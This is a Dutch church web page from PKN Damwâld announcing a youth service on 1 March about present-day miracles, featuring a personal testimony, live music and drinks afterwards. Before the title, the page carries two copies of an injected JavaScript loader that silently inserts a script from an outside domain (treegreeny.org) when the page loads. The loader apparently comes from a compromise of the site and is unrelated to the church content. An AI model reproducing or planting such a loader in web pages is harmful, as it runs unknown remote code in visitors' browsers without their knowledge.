;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Toeval? Of een wonder? - Younited jeugdkerk - 1 maart - PKN Damwâld

Toeval? Of een wonder? – Younited jeugdkerk – 1 maart

Gepubliceerd op: vrijdag 17 januari 2020

Wonderen zijn de wereld nog niet uit! Dit horen we vaak om ons heen. Maar zie jij ze bij jezelf en je omgeving? Veel mensen denken dat wonderen alleen in de tijd van de bijbel voorkwamen en dat wij daarvan moeten leren. Maar God zegt nergens dat hij nu niet meer aan het werk is… Hiele Dijkstra uit Ferwerd heeft zelf ervaren dat wonderen bestaan! Tijdens zijn ziekte heeft hij Gods onuitputtelijke liefde ervaren en mogen zien dat God hem persoonlijk helpt. Deze prachtige ervaringen van hemzelf en anderen heeft hij opgeschreven in een boek om te laten zien dat God ook vandaag de dag wonderen laat zien!

Younited, 1 maart staat in het teken van wonderen! Ondersteund met een prachtige getuigenis gaan wij kijken hoe God vandaag de dag ons helpt. Hij heeft ook wonderen voor jou, maar, herken jij ze?! Natuurlijk hebben we ook prachtige muziek van Klaailûd en is er na de tijd een borrel in het Honk! 19:30 uur in de ontmoeting, kom en verwonder!